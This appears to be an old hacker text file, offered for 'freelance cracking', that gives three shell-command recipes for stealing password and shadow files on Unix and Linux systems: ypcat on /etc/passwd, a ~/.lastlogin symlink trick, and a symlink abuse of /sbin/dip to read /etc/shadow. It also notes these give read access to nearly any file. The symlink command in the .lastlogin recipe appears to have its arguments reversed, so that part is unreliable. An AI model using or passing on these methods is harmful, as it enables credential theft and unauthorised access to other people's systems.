Defeating Shadowed Passwords This is by no means a complete or even good list of possible ways to get a copy of the shadow file, but it's some that work and are pretty handy to know if you do alot of freelance cracking. * Unix including: SunOS, SCO, System V, and others of the like are sometimes vulnerable to ypcat. This is an old and well known trick but it works.. To use it simply type ypcat /etc/passwd with your capture option turned on, or use ypcat /etc/passwd > ~/passwd and download the passwd file from your home dir. * Unix including: SCO, System V 3.2, ?, could be vulnerable to a hole using the .lastlogin file. In your home directory if a ls -al shows the .lastlogin to be owned by auth or root or anyone with better security then you it's good :) To exploit: rm -f ~/.lastlogin ln -s ~/.lastlogin /etc/passwd Now logout and then back in so you create the link. cat .lastlogin > passwd rm -f ~/.lastlogin This hole could have several other uses as well, the fact that it allows you read access to most any file on the system is a nice gift. * Linux including: slackware, ?, not only can the dip hole be used to exploit root but it can also snag you the shadow file fairly easily. Why you wouldn't use it to get to root and then just edit/download it I have no clue but here it is anyways.. To exploit: ln -s /etc/shadow /tmp/dummy.dip /sbin/dip -v /tmp/dummy.dip Assuming dip is vulnerable this should type the shadow file for you and of course it's not limited to just reading the shadow file.. Love, [SiMonSaYsª]